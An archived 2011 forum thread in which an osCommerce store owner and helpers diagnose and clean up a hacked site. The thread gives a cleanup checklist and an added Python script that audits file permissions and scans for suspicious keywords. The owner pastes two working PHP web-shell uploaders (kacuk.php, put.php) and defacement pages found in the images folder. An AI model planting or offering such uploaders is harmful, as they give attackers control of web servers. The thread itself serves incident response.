Racing Club, posted March 13, 2011

Hello, I have a problem. From one day to the next my website changed. Before, it worked fine. But now I see this message on the homepage and the admin:

homepage: Parse error: syntax error, unexpected '<' in /home/videoclub/public_html/index.php on line 35

admin: Parse error: syntax error, unexpected '<' in /home/videoclub/public_html/admin/index.php on line 26

----------------------------------------------

Line 35: <! doctype html public "- / / W3C / / DTD HTML 4.01 Transitional / / EN">

Line 26: <! doctype html public "- / / W3C / / DTD HTML 4.01 Transitional / / EN">

Please help. Thanks

I use version v2.2RC2a of osCommerce.

Guest, posted March 13, 2011

Ariel,

check your website for hacker activity. Hackers usually try to insert code at the top of the index.php files. Perhaps you can post the first 30 lines so we can see it.

Chris

Racing Club, posted March 13, 2011

Thanks for replying

index.php of homepage:

```php
<?php
/*
  $Id: index.php 1739 2007-12-20 00:52:16Z hpdl $

  osCommerce, Open Source E-Commerce Solutions
  http://www.oscommerce.com

  Copyright © 2003 osCommerce

  Released under the GNU General Public License
*/

  require('includes/application_top.php');

// the following cPath references come from application_top.php
  $category_depth = 'top';
  if (isset($cPath) && tep_not_null($cPath)) {
    $categories_products_query = tep_db_query("select count(*) as total from " . TABLE_PRODUCTS_TO_CATEGORIES . " where categories_id = '" . (int)$current_category_id . "'");
    $cateqories_products = tep_db_fetch_array($categories_products_query);
    if ($cateqories_products['total'] > 0) {
      $category_depth = 'products'; // display products
    } else {
      $category_parent_query = tep_db_query("select count(*) as total from " . TABLE_CATEGORIES . " where parent_id = '" . (int)$current_category_id . "'");
      $category_parent = tep_db_fetch_array($category_parent_query);
      if ($category_parent['total'] > 0) {
        $category_depth = 'nested'; // navigate through the categories
      } else {
        $category_depth = 'products'; // category has no products, but display the 'no products' message
      }
    }
  }

  require(DIR_WS_LANGUAGES . $language . '/' . FILENAME_DEFAULT);
<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html <?php echo HTML_PARAMS;>
<head>
```

index.php of admin:

```php
<?php
/*
  $Id: index.php 1739 2007-12-20 00:52:16Z hpdl $

  osCommerce, Open Source E-Commerce Solutions
  http://www.oscommerce.com

  Copyright © 2007 osCommerce

  Released under the GNU General Public License
*/

  require('includes/application_top.php');

  $languages = tep_get_languages();
  $languages_array = array();
  $languages_selected = DEFAULT_LANGUAGE;
  for ($i = 0, $n = sizeof($languages); $i < $n; $i++) {
    $languages_array[] = array('id' => $languages[$i]['code'],
                               'text' => $languages[$i]['name']);
    if ($languages[$i]['directory'] == $language) {
      $languages_selected = $languages[$i]['code'];
    }
  }
<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html <?php echo HTML_PARAMS;>
<head>
```

Guest, posted March 13, 2011

Ariel,

Are you sure you didn't make recent changes to accommodate additional language support?

In the index.php, this:

```php
  require(DIR_WS_LANGUAGES . $language . '/' . FILENAME_DEFAULT);
<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html <?php echo HTML_PARAMS;>
<head>
```

Should be this:

```php
  require(DIR_WS_LANGUAGES . $language . '/' . FILENAME_DEFAULT);
?>
<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html <?php echo HTML_PARAMS;>
<head>
```

NOTE the ?> BEFORE the doctype line?

It is also missing in your /admin/index.php and the language code

```php
  $languages = tep_get_languages();
  $languages_array = array();
  $languages_selected = DEFAULT_LANGUAGE;
  for ($i = 0, $n = sizeof($languages); $i < $n; $i++) {
    $languages_array[] = array('id' => $languages[$i]['code'],
                               'text' => $languages[$i]['name']);
    if ($languages[$i]['directory'] == $language) {
      $languages_selected = $languages[$i]['code'];
    }
  }
```

is not standard in the default download.

Chris

Racing Club, posted March 13, 2011

I didn't make any changes recently and I didn't touch anything. I tried what you said and it didn't work.

Thanks

Guest, posted March 13, 2011

Ariel,

This is the first 37 lines from a default index.php file. Try it. Remember to back up before making any changes.

```php
<?php
/*
  $Id: index.php 1739 2007-12-20 00:52:16Z hpdl $

  osCommerce, Open Source E-Commerce Solutions
  http://www.oscommerce.com

  Copyright © 2003 osCommerce

  Released under the GNU General Public License
*/

  require('includes/application_top.php');

// the following cPath references come from application_top.php
  $category_depth = 'top';
  if (isset($cPath) && tep_not_null($cPath)) {
    $categories_products_query = tep_db_query("select count(*) as total from " . TABLE_PRODUCTS_TO_CATEGORIES . " where categories_id = '" . (int)$current_category_id . "'");
    $cateqories_products = tep_db_fetch_array($categories_products_query);
    if ($cateqories_products['total'] > 0) {
      $category_depth = 'products'; // display products
    } else {
      $category_parent_query = tep_db_query("select count(*) as total from " . TABLE_CATEGORIES . " where parent_id = '" . (int)$current_category_id . "'");
      $category_parent = tep_db_fetch_array($category_parent_query);
      if ($category_parent['total'] > 0) {
        $category_depth = 'nested'; // navigate through the categories
      } else {
        $category_depth = 'products'; // category has no products, but display the 'no products' message
      }
    }
  }

  require(DIR_WS_LANGUAGES . $language . '/' . FILENAME_DEFAULT);
?>
<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html <?php echo HTML_PARAMS; ?>>
<head>
```

Chris

Racing Club, posted March 13, 2011

DunWeb, I have a backup of my website, but I wanted to see if someone had hacked my website

Guest, posted March 13, 2011

It is hard to say if the site has been compromised based on the little information you have given and without seeing the URL. However, if you did not make the changes to the index.php and /admin/index.php then there has been some unauthorized activity.

Chris

Racing Club, posted March 13, 2011

Url: www.videoclublasflores.com.ar

Thanks for all

Racing Club, posted March 14, 2011

The web page remains the same. I do not know what to do.

germ, posted March 14, 2011

You have hack files all over in the images folder. :o

Visit the link below:

How to Secure Your Site

Pay close attention to "SECURING THE ADMIN" - Yours is vulnerable.

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me -

"Headers already sent" - The definitive help
"Cannot redeclare ..." - How to find/fix it
SSL Implementation Help

Racing Club, posted March 14, 2011

Recently I started to look at the images folder and I found this (as you are saying):

ina.htm:

```html
HACKED BY <h4> <center> kaMtiEz </ h4> </ center> <center> <h4> <br> INDONESIANCODER TEAM @ 2010 </ h4> </ center>
```

indonesia.htm:

```html
<html><head>
<title>Hacker Indonesia</title><style type="text/css">
html, body { color: white; background-color: #000080; }
a { background-color: transparent; color: #ffffff; }
#p404 { position: absolute; top: 20%; left: 0px; width: 100%; height: 1px; overflow: visible; visibility: visible; display: block; }
#content { margin-left: -320px; position: absolute; top: -100px; left: 50%; width: 640px; height: 200px; visibility: visible; }
#errormessage { font: 50px garamond; line-height: 200%; text-align: center; }
#title, #footer { text-align: center; }
#title span { background-color: #c0c0c0; color: #000080; }
</style><meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"></head><body>
<div id="p404">
<div id="content">
<div id="errormessage">
<p>Hacked by Hmei7</p>
</p>
</div>
</div>
</div>
</body></html>
```

kacuk.php:

```php
==kacuk
<?php
echo '<br><br>'.php_uname().'<br>';
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
  if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'File Uploaded!<br><br>'; }
  else { echo 'File Upload, Failed!<br><br>'; }
}
?>
==
```

x.htm:

```html
<b><font size="5">by iskorpitx</font></b>
```

(I'm not sure)

put.php:

```php
<?php
echo '<b>The KabuS<br><br>'.php_uname().'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
  if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload Success !!!</b><br><br>'; }
  else { echo '<b>Upload Fail !!!</b><br><br>'; }
}
?>
```

----------------------------------

I'll keep the advice you gave me on "Securing the ADMIN", but can I get my website as it was before? What should I do?

Guest, posted March 14, 2011

Ariel,

Follow these steps to clean and secure your website:

1) Lock down your site by using an .htaccess password so your customers are not attacked by the hacker's code.
2) FTP all of the files to your local machine and use a program like WinGrep to identify and remove all malicious and anomalous files containing hacker code. Look for keywords such as 'base64','eval','decode'.
3) Delete the files on your hosting account before uploading the clean files.
4) FTP the clean files back to your hosting account and read and implement the security patches and contributions found in these two threads. Admin Security and Website Security.
5) Change all of your passwords: FTP, CPANEL, STORE ADMIN and DATABASE
6) Make sure File and Directory Permissions are set correctly. Directories no higher than 755, Files no higher than 644 and the TWO configure.php files no higher than 444
7) If your site has been 'black listed' as an attack site by Google, then log into Google Webmaster Tools and submit the site to be re-indexed and verified to be removed from the 'black list'
8) Remove the .htaccess password protection so your customers can resume making purchases from your website.
9) Monitor your website using the newly installed contributions to prevent future hacker attacks.
10) [Removed].

Chris

Racing Club, posted March 15, 2011

I deleted these files from the images folder:

ina.htm
indonesia.htm
kacuk.php
x.htm
put.php

In point 2, where you asked me to find these keywords:

eval
base64
decode

Those words were found in a few files called:

googleff7fe2850f15ebd7.php
googlebc44d7671aae3b3e.php
google7a14fb0c01e4e5d1.php

What should I do?

germ, posted March 15, 2011

Those are all hack files.

It's not normal on 99.99% (or more) installs to have ANY php files in the images folder.

Unless you purposely put a php file in the images folder and you know exactly what it does I'd remove any and all php files from the images folder.

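Added example (not part of the original thread, and not osCommerce code): one way to script the checks from the replies above over a copy of the site, using the keywords from step 2, the permission ceilings from step 6, and the rule that PHP files do not belong in the images folder. The extension list, the function names and the sample tree are assumptions constructed for the demo; the permission check only means something where the copy keeps the server's Unix modes, which an FTP download to Windows does not.

```python
import os
import re
import stat
import tempfile

# Keywords from step 2; permission ceilings from step 6 of the checklist above.
KEYWORDS = re.compile(rb"base64|eval|decode", re.IGNORECASE)
MAX_DIR, MAX_FILE, MAX_CONFIGURE = 0o755, 0o644, 0o444
SCRIPT_EXT = (".php", ".php3", ".php4", ".php5", ".phtml")  # assumed extension list


def exceeds(mode, ceiling):
    """True if mode grants any permission bit that ceiling does not."""
    return bool(stat.S_IMODE(mode) & ~ceiling)


def audit(root):
    """Return sorted (relative_path, reason) findings for a copy of the site."""
    findings = []
    for dirpath, _dirs, filenames in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root).replace(os.sep, "/")
        if exceeds(os.stat(dirpath).st_mode, MAX_DIR):
            findings.append((rel_dir, "directory permissions above 755"))
        in_images = "images" in rel_dir.split("/")
        for name in filenames:
            path = os.path.join(dirpath, name)
            rel = name if rel_dir == "." else rel_dir + "/" + name
            is_script = name.lower().endswith(SCRIPT_EXT)
            if in_images and is_script:
                findings.append((rel, "PHP file in images folder"))
            ceiling = MAX_CONFIGURE if name == "configure.php" else MAX_FILE
            if exceeds(os.stat(path).st_mode, ceiling):
                findings.append((rel, "file permissions above %o" % ceiling))
            if is_script:
                with open(path, "rb") as fh:
                    hits = {m.group().lower().decode() for m in KEYWORDS.finditer(fh.read())}
                if hits:
                    findings.append((rel, "keywords: " + ", ".join(sorted(hits))))
    return sorted(findings)


def demo():
    """Audit a constructed sample tree (not the poster's files)."""
    samples = {  # relative path -> (content, mode); all values are constructed
        "index.php": (b"<?php require('includes/application_top.php'); ?>", 0o644),
        "images/logo.gif": (b"GIF89a", 0o644),
        "images/put.php": (b"<?php /* constructed placeholder */ ?>", 0o644),
        "images/google0000.php": (b"<?php // constructed: eval(base64_decode(...)) ?>", 0o644),
        "includes/configure.php": (b"<?php define('DB_SERVER', 'localhost'); ?>", 0o644),
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, (data, mode) in samples.items():
            path = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "wb") as fh:
                fh.write(data)
            os.chmod(path, mode)
        os.chmod(os.path.join(root, "images"), 0o777)    # world-writable: flagged
        os.chmod(os.path.join(root, "includes"), 0o755)
        return audit(root)


if __name__ == "__main__":
    for path, reason in demo():
        print(f"{path}: {reason}")
```

Keyword hits are leads for manual review, not verdicts: legitimate PHP also contains these strings (for example in function names ending in `decode`), so compare flagged files against a clean download of the same version before deleting anything.
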
Guest, posted March 15, 2011

Jan,

I see you edited #13 post. Please explain where in the forum policies it says I can not invite other members to PM me for additional help? I have read the forum policies AGAIN, and could not find anything to suggest that I have broken any rules.

For the record, here is #10 on the list again:

10) If you feel you can not perform any of the above steps, PM me for help, because if you miss any of these steps your site may remain accessible to the hacker.

I welcome your response here in the forum, so everyone can see it.

Chris

Racing Club, posted March 15, 2011

I deleted these files and tomorrow I will download version 2.2 for correction of the two index.php.

Thanks, I hope it works

Racing Club, posted March 16, 2011

At the footer of the index.php I found this:

[obfuscated <script> block removed]

I already removed and now I'm adding this: ?> because it is missing several lines. I'll report how I progress. Thanks! I was slow to respond because I spent the whole afternoon removing a virus in my computer

Racing Club, posted March 16, 2011

I am done! Now when I go to my website or the admin, the page goes blank. When loading in Internet Explorer I see other addresses down at the bottom.

Thanks!

Racing Club, posted March 17, 2011

please help! Thanks!

Guest, posted March 17, 2011

Ariel,

If you are seeing other URLs in the progress bar on the footer of your browser, this means you have not cleaned the site entirely. If your Admin page is blank, then there is a code error, possibly whitespace before or after the opening or closing PHP tags.

Chris

Racing Club, posted March 17, 2011

Chris,

Look at the footer of my browser:

What should I do?

Racing Club, posted March 17, 2011

That only happens when I open my website with Internet Explorer; with Mozilla Firefox it does not happen. Could someone go to my website and see if it is the same, please?

Thanks

Guest, posted March 17, 2011

Ariel,

I am not seeing that using IE 8 or FF 3.6. I suggest you clear your temp files and cookies and reload your browser again.

Chris

Racing Club, posted March 17, 2011

> Ariel,
>
> I am not seeing that using IE 8 or FF 3.6. I suggest you clear your temp files and cookies and reload your browser again.
>
> Chris

What do you see? Because I deleted temp files and cookies and I keep seeing the same thing.

Thanks!

This topic is now archived and is closed to further replies.